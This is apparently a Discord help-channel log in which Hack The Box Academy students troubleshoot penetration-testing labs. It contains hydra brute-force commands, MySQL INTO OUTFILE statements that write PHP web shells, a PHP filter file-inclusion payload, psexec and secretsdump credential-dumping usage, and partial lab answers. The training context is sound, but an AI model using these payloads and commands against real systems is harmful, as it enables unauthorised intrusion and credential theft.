#modules
Ok, might take my brain a while to adapt to this section
if it makes you feel better, the way nodejs handles this differently than usual software stacks is precisely why this vulnerability occurs in the first place
cause devs are thinking just like you and not realizing the parameters can be tampered in such a manner
Ok, I'll see if I can speak to Mr GPT and have him explain the concept to me
Also, reason #500 why learning to code is important in this line of work. Everyone says it isn't necessary, but it sure would help tremendously
```javascript
// MongoDB query via the Node.js driver (callback style); the
// { status: { $ne: 'completed' } } filter object is what the chat is discussing
db.collection('tasks').find({ status: { $ne: 'completed' } }).toArray(function(err, result) {
    if (err) {
        console.error('Error executing query:', err);
        return;
    }
    console.log(result); // callback and call closed here; the original paste stopped short
});
```
that is a mongodb query using node.js
the people that say it isnt necessary are lying to you
maybe u dont necessarily need to know how to code
but u have to understand and interpret the code
Next module will be the Python one. I should have done it before the Advanced SQL Injection module, but I managed to get away with finishing it anyway
hey, does anyone have any idea why hydra shows this error when brute forcing smb?
[ERROR] invalid reply from target smb://10.129.xxx.xxx:445/
this is the section I am at https://academy.hackthebox.com/module/147/section/1326
are u connected to the vpn
yup
yes, and using 445
You don't need to specify the port since you're already doing it with smb://
I am not
you put :445
hydra -L usernames.txt -P password.list <IP> smb
the error msg shows it, but I didnt put it
Oh, i see
try restarting the machine lol
Try CME? That's my go to for bruteforcing smb
not the solution :c
if u try cme to that ip it works?
it's an option, is there a way to not print every failed attempt?
grep +
| grep '+'

SQL Injection Fundamentals https://academy.hackthebox.com/module/33/section/799 https://academy.hackthebox.com/module/33/section/194
is there someone i can ask about these 2 questions? I think I haven't done it with the intended payload
For the DNS part of common services, I need help.
I got 9 subdomains from subbrute
none seem to work for the axfr.
I edited /etc/hosts with target IP and tried also with the IP found using the host command.
It still shows connection problems.
I tried commands such as
dig axfr inlanefreight.com @subdomainFoundBySubbrute
host - l inlanefreight.com server XXXXXXXX.inlanefreight.com
What am I doing wrong?
Hey peeps
Can somebody explain this to me, I am confused about why it happened:
I see on this example they set the session to 2, because that's where the first exploit happened. To now execute the post-exploit. All good so far...
But then why here they switch to session 3? 🤣 I just don't wanna miss what's actually happening
When they focused the local suggester on session 2 it was to find local escalation exploits. But then when they are going to execute it (ms10_015_kitrap0d) they use session 3? But what would be on session 3? Shouldn't it be the same session where the first exploit connection happened (session 2)?
Module: Using the Metasploit Framework
Section: Introduction to MSFVenom
```javascript
const token = ""; //Current Token For Discord Auth
const urpassword = ""; //Current Password (Required For API Call)
const username = "" //Your Wanted Username
let xhr = new XMLHttpRequest();
xhr.open('PATCH', '/api/v9/users/@me');
xhr.setRequestHeader('Authorization', token); //Adds Token To Discord Request
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send(JSON.stringify({ "username": `${username}\u009E`,"password": urpassword })); //Send Data
```
Code For One Letter Username on discord using ascii codes of new line digits
I was confused by this question too. The question is actually asking about password policies in general, not about any particular host. The answer can be found on the module page. Hit CTRL+F and search for "password" on the page and you should find the answer.
they created the session 3 to run the exploit
Right, does that mean they exploited again? Therefore a new session?
Like session 2 was for reconnaissance in a way, and the 3rd session was another exploit?
i was referencing that message lol
u deleted it before i could hit enter
they only exploited it 1 time
Has anyone done the Plink pivoting module? I am confused on what I need to do for it.
are u in a windows machine?
I am, so just run plink to create a tunnel back to my attacking box?
AD enumeration and Attacks in the Credentialed Enumeration - from Linux part Q1
I've converted Decimal 1170 to 0x492 and I'm currently trying to enumerate the user via rpcclient using `queryuser 0x492`. Can I get a small hint on what I might be doing incorrectly?
(Nvm 🙂 remove spaces)
windows should be ur attack box
Note: We can attempt this technique in any interactive section of this module from a personal Windows-based attack host. Once you've completed this module from a Linux-based attack host feel free to try to go back through it from a personal Windows-based attack host. Also, when spawning your target we ask you to wait for 3 - 5 minutes until the whole lab with all the configurations is set up so that the connection to your target works flawlessly.
it says it in the section
I guess I just dont understand the question. "Attempt to use Plink from a Windows-based attack host. Set up a proxy connection and RDP to the Windows target (172.16.5.19) with "victor:pass@123" on the internal network." .... I already have a SSH tunnel/proxy setup to access RDP on the other host. Not sure how I would use PLINK on the windows box if I wouldnt have access to it without a tunnel already set up.
Is anybody facing any connection problem with Skill Assessment - Broken Authentication?? I've reset the target many times, but it still times out. Tested in a different browser also
just do it without plink if u not using windows
use whatever u want from linux
If someone has any doubt in a module ask me, i might have done it 🙂
Hi, i need help on how to set up port forwarding in the following scenario: attack host -> pivot 1 -> pivot 2. I have been able to set up port forwarding through pivot 1 by running "ssh -D 9050 pivot1" then adding "socks4 127.0.0.1 9050" to proxychains.conf. I tried to do the same to set up port forwarding through pivot 2: "proxychains ssh -D 9051 pivot2_ip", then add "socks4 pivot1_ip 9051" to the previous proxychains.conf file, but it doesnt seem to work. Does anyone know what I did wrong?
i have a question regarding intro to active directory module
both kerberos and ldap perform user authentication.
kerberos is used first to get the service ticket.
then when is ldap used to authenticate?
what percentage of CBBH is complete if I complete CPTS path?
I am currently doing the Web Service & API Attacks. I used the Wsdler extension then sent the login operation request to repeater and tried to send the request as is but I am getting that error ... why is that?
close to 55%
That sounds more like the percentage of CPTS path completed after CBBH than other way around
Are you sure its not 85%?
It's 55%. The core difference between CPTS and CBBH lies in Network pentest vs Web App pentest.
right and what percentage of CBBH is in CPTS?
wait what?
I thought CBBH had 55% of CPTS and 85% of CBBH was included in CPTS?
no?
I'm not sure, what the percentage for the other way around is. I've worked only on the CPTS modules.
ok cool. I will wait for someone else to answer then
If I had to do the maths, it would be somewhat less than 50% I guess
dumb question of the night: working through CPTS and all the windows boxes have username/password, but every time I use xfreerdp I just get a black box and am not able to get in
is there a typical cli tool I'm missing?
just hit enter
Hi, a lot of people do CBBH path before going on CPTS journey. I already started CPTS but I want to be able to bug hunt. I completed first module of CPTS and now I'm doing getting started module which is second module. Would it be terrible if after this module I switched to CBBH?
I feel like it would be great to be able to bug hunt so I can make money you know?
You're totally fine to switch as you want
I was suffering from the black screen too, I just thought maybe it's just at the blue warning screen and hitting enter helped lol
is there a practical reason not to tho?
i luv cpts path, i did oscp before AD was in my exam, so this is cool
try reaching out to support
okay, thanks, I wrote to an email yesterday, hope I will get a response soon
would appreciate any hint/suggestion on this
I am stuck on Credential Hunting in Linux. I got the password for the user kira and am logged in via ssh. Any hint on where to look for the password of user Will please?
chase the fox
someone here did the introduction to bash module?
The way to do it is shown in the module. If I remember correctly it does not show on the cheatsheet though
?
Hello im in password attacks hard lab, i have a file.vhd but it is bitlocker encrypted. i tried to crack it and i have a pass but when i try to mount it it doesnt work, could somebody help?
give this a try #modules message
Hey i need a discord bot made specifically for my server think of it as a challenge and ill explain the details on our dms
sure which section are you on?
thanks!
I will dm you
And if that doesn’t work for you, you can also mount it to your windows host. It’s a lot easier
That’s what I ended up doing
i did that the first time i solved that assessment 🤣
hello guys
I have encountered some problems, I tried to brute force ftp, ssh, smb but can't get the initial credentials, can someone give a hint?
got the flag
what wordlist are u using?
Password-Attacks.zip
Good stuff 👍🏼
yes i am not using rockyou
hydra -L ./username.list -P ./password.list 10.129.202.64 ftp -t 64
Like this, but trying to brute force various services, nothing works
hi, trying the linux privilege assessment room, trying to figure out how to get flag2.txt, any ideas would be appreciated?
yo have another think in latest questions
you create it
think of a mechanism that stores certain things that have been ran in the past
hi, i need to contact an administrator, how so?
morning buddies, at password attacks lab - hard, i got the backup on my attack host, i am trying to mount it but it requires a key or passphrase for ("/dev/sda2"), i tried everything i could get from the vault and searched every file in the shares and sys but got nothing, am i on the right path?
reach out to support (green bubble)
in one of the sections in the module it is showcased how to crack the password for such a file
why would you need an administrator for
i read the welcome page, thus i needed to authenticate the account identifier. that being said, i made 3 mistaken attempts, so it says that i need to get support from the admin, contacting the bot is not working anymore
because
read the error message you are getting again
Identification error: please contact an online Moderator or Administrator for help.
oh i forgot about it 😅 thanks a lot friend 🥰
feel free to dm me
hmm ok understood
hey friend, sorry to annoy you again, i copied the vhd file to my main windows os, its mounted but when i double-click the new created D:\ disk, nothing happens
research
heya! I am in a 3rd world country and the pwnbox instance is kinda slow to run. Is it possible to use my own vm with kali installed in it and interact with the target to be able to finish the module? Thank you!!
yes
Thank you so much for the quick response @autumn pilot !
Hey ! i'm stuck in the live engagement of the module "shell&payloads", when i run the exploit for the host 2 msf returns this : Unexpected json response, and idk why. Can someone help me ?
yeah i found the flag, many thanks for the tip.
i got it ty
Hi everyone, Module: PIVOTING, TUNNELING, AND PORT FORWARDING, Chisel lab. On the pivot box (ubuntu) I have transferred chisel but i cannot execute the binary as it needs some glibc library. To recompile chisel i need to install go, and go cannot be installed as there is no internet on the ubuntu box. Can anyone advise the way out to run chisel on the pivot box?
you'll have to recompile it on your machine and then transfer the new binary over. Make sure you set the flag export CGO_ENABLED=0 before compiling to fix the issue
In case you don't want to recompile it there is one already compiled at:
https://github.com/jpillora/chisel/releases/tag/v1.8.1
Ohh got this. I think its better using the compiled version. Gonna try the compiled 1.8 version this time.
Many thanks for pointing in right direction.
sounds like a threat
Hi, I'm in the password attacks module, in password mutation. to solve the questions I made mut_password.list depending on custom.rule, so when using hydra with the sam user I can't solve the question, and I tried to use crackmapexec, still not working. any hint?
hint: remove the first 17000 words
can someone maybe help me with the answer to the loop control part of the bash introduction module? ive been trying to finish it for a couple hours and im pretty sure my script is ok but it refuses to run no matter what i do
talk with chatgpt, maybe it can pinpoint the mistake in your loop
hi, sorry. any tip for flag5.txt . been trying for some time now. no luck.
it is simpler than you think, don't overcomplicate it
k
For some reason the only change gpt made is "" around variables so it would 100% take their values, and it now tells me that it does not work because of limited storage on the hdd
checking in gtfobins, found that command
executed it as shown in gtfo, but i am stuck. no idea what to perform next
if you have executed the command in the shown sequence, then you will have a shell
where to put in the second part of that command? once i type in the first part of the command i get some output
and the second part of the command as shown in gtfo bins is executed as a separate command
!/.... not found
Bro this is another challenging not hint 😅
yeah, that's the hint for that section: the right password for the sam user is 17000+ words deep, so removing the first 17000 words makes the brute forcing much faster
Can someone help me out with shells&payloads module live engagement host3? solved
sure
Great… I used this command to remove the first 17000 words: # sed -i '1,17000d' mut_password.list. this makes my file empty. to check how many words I have: I've just 1504 words
then your mut_password is broken. should be much larger than that
yeah that list should be 94k+
can anyone help me with Exploiting Web Vulnerabilities in Thick-Client Applications?
IDK why I have just these words. actually I used this command to generate mut_pass: # hashcat --force password.list -r /usr/share/hashcat/rules/custom.ruls --stdout | sort -u > mut_pass. I made my custom rule depending on the 'Hashcat rule file' section
use the given rule not that rule
wait a sec, there is no rule with that name in the default hashcat rules? (i checked on the pwnbox)
No in your kali you should make our rule or use default rule
I will try on best64.rule
just use the given rule in the resources
Hello all
I'm just doing Attacking Common Services > Attacking FTP and I got a problem at the beginning
There is no ftp port open, neither 21 nor 2121
Any ideas what is going on?
give the machine 3-4 minutes for the services to load, and if they haven't reset the target
try to reset or give it some time
I was trying it
😦
any other ports are visible but ftp is not working don't know why
bro they test ur patience too, so make sure you r trying ur best
I also terminated and set up the target again
then wait
I love them
despite best64 being the most common, it still doesn't work
now it's working XD
I told you bro
patience comes second right after knowledge
you have powershell?
I'm 7 years with my fiance, I'm soo patient XD
ahahhahahahhah
you killed that
I will send you example
check dm
I'm doing the last chapter of Getting Started module, the box called gettingstarted. I get the user flag, logged as www-data user and having difficulties on getting root.
I found out:
||I can execute a symbolic link as sudo but when I execute it nothing happens, I tried to edit the pointing path but I got permission denied.
I found out that the sudo version is 1.8.31 and there is an exploit but executing it was unsuccessful and honestly I dont know what parameters it is asking for.
I am guessing that maybe I have to become user mrb3n and then do something else... or find the SSH key somewhere and log in as mrb3n i dont know...||
I need hints I dont want to check the writeup, please point me in the right direction.
what is the command that allows running the specified command as a certain user, how can you check for that particular command
Hello, i really need help for one of the modules, i think it is a bug or something
it helps if you specify the module name and section, and eventually on which question
Attacking Enterprise Networks - Active Directory Compromise
The question:
After obtaining Domain Admin rights, authenticate to the domain controller and submit the contents of the flag.txt file on the Administrator Desktop
ya I found it ||B@*******|| thanks 😊
Convert-NameToSid that's a powerview function right? Have you imported the PowerView module?
yeah
well you are assigning the command to a variable, until you call that variable in a subsequent command it will not return anything
what if you run the command without assigning it to a variable as scriptie suggested
im running this as admin
The only command I know so far is ||sudo -u mrb3n /usr/bin/php|| but I had the same result, no output.
I found out this:
||```
www-data@gettingstarted:/tmp$ sudo -l
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
```||
I am afraid it might be a rabbit hole and not the right direction.
if it had to be run as that user, it would be specified in the output below
focus on ||(ALL : ALL)||
also, think if this could be in GTFObins
can you try ConvertTo-SID
regarding the hard lab in password attack, when i try to mount the bitlocker drive on a windows host i get a "Your account doesn't have permission on the domain to mount this file". When i try to mount it on Linux using dislocker and losetup (as was mentioned by Payload Bunny) i get "[CRITICAL] Cannot parse volume header. Abort." Any help would be greatly appreciated!
run the command outside of the variable you have assigned
Convert-NameToSid - converts a given user/group name to a security identifier (SID)
Yeah, I thought the problem would be with Aliases. not the case here.
Have you successfully imported powerview?
yeah
you are running a different command than the one already shown
do u know how?
the command is Convert-NameToSid and not "Convert-ToSid"
Can you list the files on the desktop
Convert-NameToSid "DOMAIN\Server Admins" like this but it's totally a try
wont work
Oof.
it's shit
Can you list Server admins using net group
you can also use sharpview binary
Maybe try closing the session and import the modules to a new one and try again.
Powershell session*
@untold lily can you check the md5sum of the vhd?
i got it..
its different lol
So try another way of transferring it over, they need to be the same 👍🏼
I had the same problem at first
how about the windows method. why is it requiring me to have permission to mount it?
The md5sum is not the same so I doubt you can even mount it, since it’s corrupted
Try another way of transferring, if the md5sum is the same, the windows method will work
javac: file not found: fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java
Usage: javac <options> <source files>
use -help for a list of possible options
I am getting this error, what can I do?
Exploiting Web Vulnerabilities in Thick-Client Applications
ok thanks
Let me know if it works👍🏼
the problem was that i need to use different user (run power shell as different user)
I just solved it. Thanks bud, i couldn't have done it without your help!
Good job!💪🏼
How does one dump sam/lsa using a local administrator account in secretsdump.py You can do that in cme but can you in secretsdump?
Did you find a solution for this? Facing the same issue
Guys, I need help with Exploiting Web Vulnerabilities in Thick-Client Applications
where should I drop this code? exactly at which line? (see below)
```java
import java.io.FileOutputStream;
<SNIP>
public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
    String methodName = (new Object() {}).getClass().getEnclosingMethod().getName();
    logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
    if (AccessCheck.checkAccess(methodName, this.user)) {
        return "Error: Method '" + methodName + "' is not allowed for this user account";
    }
    this.action = new ActionMessage(this.sessionID, "open");
    this.action.addArgument(foldername);
    this.action.addArgument(filename);
    sendAndRecv();
    // backslashes must be escaped in a Java string literal, otherwise javac rejects "\D"
    String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
    FileOutputStream fos = new FileOutputStream(desktopPath);
    if (this.response.hasError()) {
        return "Error: Your action caused an error on the application server!";
    }
    byte[] content = this.response.getContent();
    fos.write(content);
    fos.close();
    return "Successfully saved the file to " + desktopPath;
}
```
while editing fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java
yes
I did
look for other Disks
there are other ones
dm me
I recall that being possible with the registry hives via RDP or an elevated shell session with the hklm/sam security and system then dump with secretsdump, need the syntax?
Guys
any help please
are you talking about the reg save hklm\<hives> file?
I'm not talking about techniques or tool outside of secretsdump.py in this case
Just a thought that crossed my mind, whether secretsdump.py can do it because crackmapexec can
thanks, managed to resolve it. can i check for the 2nd part of the assessment, if you have managed to perform a stacked query + rce using the postgresql library?
Stack query?
Module: Kerberos Attacks
Section: Unconstrained Delegation - Users
I have got the .ccache file. But I cant do DCSync Attack
You dont need to go that far. You just need to perform an injection similar to what's demonstrated over the last 3-4 chapters of the module. I'd recommend taking the demo POC code for the Command Execution and modify it for the Skill Assessment. That way you can iterate through your tries more quickly.
Linux Prive Esc just got bigger
50% increase
Yup lol
if you know the issue please ping me @acoustic owl
which SPN have you used?
im doing web proxies, encryption and decryption section
i get the base64 - i decrypt it three times then i get this ||JTQ4JTU0JTQyJTdiJTMzJTZlJTYzJTMwJTY0JTMxJTZlJTM2JTVmJTZlJTMxJTZlJTZhJTM0JTdk|| what is this? in the hint it says use b64 and html encoding but this is not html encoding lol
Well it could be multiple layers of encoding
If you tried 3 layers and it still looks weird, might be 4, might be more 🤷🏼♂️
yeah, this just did not look like b64 lol
Have you tried though?
yeahyeah i finished it
just saying doesnt look like b64 xd
Dont say such worrying things. I want to finish off the last few modules!
If the character set matches it's always possible. Decoding is always a bit guessy
That's exactly what I thought lol
Though it is kinda cool to get more content
This is why you use CyberChef. It will automatically confirm it for you 😄
Can I get some help with the Footprinting module? Specifically the IMAP/POP3 section
I didn't want to suffer alone 🧑🦯
Ask what you want to ask here directly, will make it easier for everyone to take a look and answer you.
Ah ok
I'm stuck at the question about finding the admin's email address
I can authenticate to the IMAP server using OpenSSL but there are no emails in the inbox
I'm not sure if I'm doing something wrong or looking in the wrong place
The next question also needs me to access the emails in the IMAP server but I just get 0 emails listed there
It's a bit tricky to list it but I believe this cheatsheet should help https://donsutherland.org/crib/imap
You can use Evolution to make it easy, but it's not the intended way.
This is what i see in the IMAP server
```
* LIST (\Noselect \HasChildren) "." DEV
* LIST (\Noselect \HasChildren) "." DEV.DEPARTMENT
* LIST (\HasNoChildren) "." DEV.DEPARTMENT.INT
* LIST (\HasNoChildren) "." INBOX
```
Now i just noticed that DEV and DEV.DEPARTMENT have \HasChildren
But I can't figure out how to select them
Should i go for the windows and windows command line introductions if i already did the tryhackme ones and i have experience with both?
Hello! Could you give a hint for Abusing HTTP Misconfiguration Skills Assessment - Easy? Solved Hard, but this I can't understand. Tried a lot of ||session puzzling|| combinations. Sorry for tagging @pine dagger, can't DM you, we already discussed with you this module
Why can't i start an instance for the Linux Privilege Escalation room
Hi all, I have been stuck on Attacking Email Services for a few days now and i cannot figure out what im doing wrong. i found the user but when i try to brute the password either with the provided list or Rockyou i get no hits. i have tried "username" and "username@inlanefreight.htb" and still no luck
👋 Hi everyone!
Can someone please help me with "Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer" from "Active Subdomain Enumeration" module?
FYI, I have completed all Questions from the module, and have found the answer from the aforementioned question as well. But I still feel like I managed to find it by trying out things rather than being certain about it.
I went through various links posted in previous threads (like https://www.cloudflare.com/learning/dns/glossary/dns-zone/ and https://ns1.com/resources/dns-zones-explained) but I feel like what I found in those links does not reflect what the question was actually asking for.
Can I DM someone that can help me as to why the answer is the specific one, and what defines a "zone"?
you're probably fine without, then. If you run into issues in other modules you can always go back to the fundamentals
message support in that case. they'll be able to help
👍
is it the file inclusion module bugged?
i have no button to click in complete
hard reload the page maybe?
i hadnt submitted an answer lol
i just wrote it in my notes
is there a way to list the /usr/share/flag directory in the last question?
i did ||/usr/share/flag/flag.txt|| just guessing the flag
but not sure if i can list the directory
b select <inboxname>
I don't remember any ||/usr/share/flag|| directory. which section is that?
Submit the contents of the flag.txt file located in the /usr/share/flags directory.
you have a typo
Hi, I've a problem when using pypykatz on my machine to break lsass.dmp. anyone know how I can solve it?
I search in google but I didn’t find anything
wdym
you have mistyped one of the directories
ah well flags*
Error is no module named 'msldap.commons.url'
have you tried pip installing msldap?
To resolve this issue, you can try the following steps:
Verify installation: Confirm whether you have installed the 'msldap' module and its dependencies correctly. You can use the following command to install it via pip:
```
pip install msldap
```
Upgrade the module: If you already have 'msldap' installed, you can try upgrading it to the latest version using the following command:
```
pip install --upgrade msldap
```
Check import statement: Ensure that you are importing the module correctly in your Python code. The import statement should be:
```python
from msldap.commons.url import LDAPURL
```
Check module availability: If you have installed 'msldap' but still encounter the error, it's possible that the module doesn't include the 'msldap.commons.url' submodule in its latest version. In that case, you might need to consult the documentation or contact the module's maintainers to confirm if the submodule has been renamed or removed.
Environment isolation: If you are working in a virtual environment, make sure you have activated the correct environment where 'msldap' is installed.
By following these steps, you should be able to resolve the "No module named 'msldap.commons.url'" error.
Thanks but when following your steps still nothing changes .. after I write Import statement on python code still nothing change
Attacking Common Applications
Attacking GitLab Find another valid user on the target GitLab instance. I have found 11 usernames but none of them work. what wordlist do i use?
Ya nothing change🥲
Hi! I have question regarding XSS module Section Hijacking. Who can assist?
I'm considering giving the Info sec foundations a go, as I've not really tried learning anything about pen testing etc before and I'm fairly new to an IT career. just wanted to hear what people think of the paths and modules from hack the box etc
InfoSec foundations is def a good starter for you then
can anyone give me a HINT in "Active Directory Enumeration & Attacks " "Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux" section's last question? how can i login to ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL
from the provided attack host you can reach the machine
i have the sapsso user and its password. i tried to login with those credentials using psexec but it didn't work
any other idea?
you are on the right path, focus on how you need to construct the command
this is command im running --> psexec.py academy-ea-dc03.freightlogistics.local/sapsso:PASSWORD@172.16.5.5
and this is response --> [-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
is there any mistake in the command?
the IP from what I can see and maybe you can work on the netbios name
Thanks again it’s working now just Im uninstalling pyp and reinstalling
this is DC's IP . question is about logging in ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller
i dont have other idea which IP should i use
I am working on attacking common services, attacking ftp, and I am either getting no results for the username available on the server, or I am getting the user for the SMB section. I am using hydra and the lists provided on port 2121. I see that some other people have had this issue but no resolution to the problem was posted in the discord. Am I missing something here?
are you using the provided username and password lists?
yes
Is the port 2121 opened or closed?
it was open yesterday when I was having the issue, and just now it was closed... I just restarted the target and I am running hydra again. Confirmed that I have the correct lists being used too.
It found no valid passwords
using -t 64
target is up
no results
Any ideas ?
Do you still need help?
Which module?
feel free to dm me your command
connection refused
and rockyou says it is going to take multiple days to finish
rockyou is not the wordlist you have to use
Attacking Common Services
and not the provided one either?
Doesn't the module provide a list?
it does, it's just me being a complete moron... i just saw my typo as i was dm'ing @autumn pilot but thanks for your help guys
that exercise has a twist
am trying to decode a file from base64 how can i do it?
am trying cat file | base64 -d
base64 -d /tmp/file
hmm, that should work tho. If it ain't too long try putting the same on cyberchef and see what you get
/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
Ah PHP wrappers
you've prolly messed up somewhere on extracting the base64 I guess
try outputting it to a file directly with curl -s
I am not sure what you are referring to with another list
There is a downloadable wordlist in the module top right I think
that is the one I have been using with no results
I remember having some problems with the FTP one I had to redeploy the vm a few times
there is one more on the service itself
hellooo I'm working on Linux Privilege Escalation today, and the content update looks neat!! I'm having trouble booting the new VM though—is that to be expected since it's new and I should try again in a few hours, or is there something for me to update or troubleshoot?
VMs failed to spawn. If this persists please contact support.
any hint?? i tried a lot of payloads but i dont get it work
nvm i was using the my ip from yesterday and that is why i couldnt get the shell lol
there's a mistake on module 19 section 102 Filtered Ports > 443, but it's supposed to say port 139
What's the contents of table flag10? (Case #10):
--random-agent
(for anyone else who needs it: I got an update from the support staff, saying basically "yep we're working on it!")
Is there a module for learning Android pentesting?
thanks
also english only server
ok, only english, and thanks a lot
i think offensive security has android and iOS section
also MacOS
can anyone help me on the Attacking Common Services: Easy Lab, I'm having trouble figuring out how to upload my reverse shell to C:\xampp\htdocs. I've tried a few methods with no luck
Ok, I'll check it right now.
what did u try
i tried uploading using mysql
what command did u use
||SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\xampp\htdocs\hell.php";||
also tried various method || select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE 'C:\\xampp\\htdocs\\hell.php';||
swap " for '
for both ?
yea
an this is wrong by the way
u doing INTO OUTFILE 'PATH"
still doesnt work
||SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "C:\xampp\htdocs\shell.php";||
What's the contents of table flag11? (Case #11):
"link"
--tamper=between
-.- swap ' for "
and " for '
||SELECT '<?php echo shell_exec($_GET["cmd"]);?>' INTO OUTFILE 'C:\\xampp\\htdocs\\final.php';|| doesnt work 😧
hey can anyone provide a bit of help I'm trying to do active directory enumeration and attacks and the rdp credentials are saying incorrect via my local kali and the pwnbox u got any solutions
are u just trolling?
lol no why ?
why u have \\
u not using the right credentials
i just experimented it out because of this MariaDB [(none)]> SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "C:\xampp\htdocs\l.php"; ERROR 1086 (HY000): File 'C:xampphtdocsl.php' already exists even tried with \ same the blank page
they are the credentials provided by htb copied and pasted
^*
like it I just need to run inveigh but I can't rdp to do so
with ' '?
I'll try now
||SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\xampp\htdocs\backdoor.php';||
ERROR 1 (HY000): Can't create/write to file 'C:xampphtdocackdoor.php' (Errcode: 22 "Invalid argument")
still not working
should be pointed out that xfreerdp gives me a black screen rdesktop will remote but invalid password
and if i used \\ it works but doesnt get command execution ||MariaDB [(none)]> SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:\\xampp\\htdocs\\backdoor.php'; ERROR 1086 (HY000): File 'C:\xampp\htdocs\backdoor.php' already exist||
press enter
ig im making some dumb mistake
thank you did I just miss a prompt or something
man if it already exist just create it with other name
although it just booted me off and is now failing to connect at all
who else having the same problem like me on WINDOWS PRIVILEGE ESCALATION MODULE, the RDP sessions are not stable or it is from my network ?
do you have pwnbox and vpn active at same time?
just VPN
ah dunno then
man thank you it worked . by this 🙂
someone could help me
||i created a file called shell.php in /var/www/html||
||and i changed the php.ini parameter:
disable_functions = system,exec,shell_exec||
i restarted the page and im asking for the shell but nothing
┌──(root㉿kali)-[/usr/…/wordlists/seclists/Fuzzing/LFI]
└─# curl http://10.129.x.y/shell.php&cmd=id
[1] 186854
┌──(root㉿kali)-[/usr/…/wordlists/seclists/Fuzzing/LFI]
└─#
[1] + done curl http://10.129.x.y/shell.php
whats your shell.php
<?php system($_GET['cmd']); ?>
hello, when I run subbrute.py is it normal it returns :
No nameservers found, trying fallback list?
it wont show in the screen, gotta fetch the error log itself
in lab environment? yes
yes in lab.
gotta change the nameservers
in resolvers.txt?
depends
u had to use hackthebox.com
if i remember well
I made the mistake to enter "inlanefreight.com" instead of htb...
I get the correct results now...
Can I DM someone about the pivot/tunneling section and using rpivot? I have the tunnel set up, but not having luck getting the flag
u just have to use firefox
this tool is god
GitHub - p3nt4/Invoke-SocksProxy: Socks proxy, and reverse socks server using powershell.
Ohh k
this is for learning with ethical purposes
Module: Active Directory Enumeration & Attacks
Section: DCSync
Problem: Trying to use impacket-secretsdump to perform the DCSync from Kali but keep getting "STATUS_NO_SUCH_DOMAIN". Anyone see any glaring issues with my command? I've already gotten the answer with mimikatz, but it'd be good to know what i'm doing wrong here.
Like it suggest, add -Pn
are you connected to the vpn? can you ping the address? what module/section are you doing?
u doing this question?
What is this user's cleartext password?
yeah i got it with mimikatz, just wondering why impacket wasn't working for me
that isnt the ip
I'm not sure i understand what you're saying...
I also tried impacket-secretsdump -just-dc -dc-ip 172.16.5.25 inlanefreight/adunn...etc...
do this module first
that isnt the ip either
and they give u an account to log in with ssh
if im right
or if u want do it from ur machine just do a dynamic port forwarding to the ssh
it was rdp
port 22 isn't open
read the beginning of the section
oops, now i remember lol have to use their parrot box
and this is not the adunn ip
do ping sweep if u need
but the ip is in the section as well
yeah its 5, i did get-domaincontroller
well gn gl
👌 cheers
you are having a problem with DNS resolution. Try to specify the entire domain name (FQDN), like inlanefreight.local/user:pass and use the name of the computer instead of ip like: dc01.inlanefreight.local. Of course, make sure everything is well set up in your host file
the academy has been a pretty fun journey. I learned a lot through all these modules so far, let's continue hacking! 😎 💪
yeah, figured it out. It was just the specific environment. I ended up proxying through the box and it worked as advertised
Can anyone point me in the right direction?
Im stuck on AD enum&attacks assessment part 2 with the question "Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in the file?" I have found all other users and their credentials and have answered every other question in the assessment. i have enumerated sql01, ms01, dc01, several times over and rummaged through rpc mssql and smb shares on every host and I am stumped on where the hell I'm supposed to look. can someone give me a clue to what im looking for?
I have had a 2 day long headache trying to find this file just looking through files and folders and now im just completely burnt out trying to figure this out
which tools have you tried so far
crackmapexec, responder, windapsearch, inveigh, kerbrute, several impacket python scripts: secretsdump mssqlclient smbclient mimikatz and a few others i cant remember right now
rpcdump rpcclient
evil-winrm
powerview
well, you need to search for a configuration file, most of the tools that you have mentioned won't be much of help
check the "Credential Enumeration - from Windows" section, there is a tool that you haven't mentioned in it, which will help you
Doing the "Miscellaneous Misconfigurations" Section in the Active directory module.
I have found the cleartext password for mmorgen, but it isn't accepted as the correct answer. Can I get a sanity check?
yea, it is kind of misleading, get the password of the user you have found in the first question
Getting back to this, is there something I need to do even after adding a new/existing user to the administrators group to dump SAM using mimikatz?
Try token::elevate first
Hey! I need help for mobile challenge waiting. I'm stuck secret activity. Already tried ghidra and GDB but not able find flag.
Can anyone guide me for the challenge??
Hello, where can I download my invoice receipts for payments made?
they are usually sent automatically, however, if you haven't received any you will have to reach out to support
I already have verified my account.. when joined
@autumn pilot Thank you, i found it, dont know why i totally just spaced snaffler. lmao i hella read through that section like 20 times it seems and you're right it was the only one in that section i didnt try. i feel so dumb now lmao thank you tho as soon as i found it my headache instantly started to go away lol
@autumn pilot can you give me some hints regarding challenge?
nope, sorry
Ask best in the channel #challenges
Hey guys I need some help with the os ticket part of attacking common services, I am not able to access my ticket once I create it keep getting access denied
it is simpler than you think, there is something in the section that you can utilize in the exercise
part of data that will help you achieve something
Thanks done it, that was stupid why even mention the other way if we weren't gunna use it 🤣
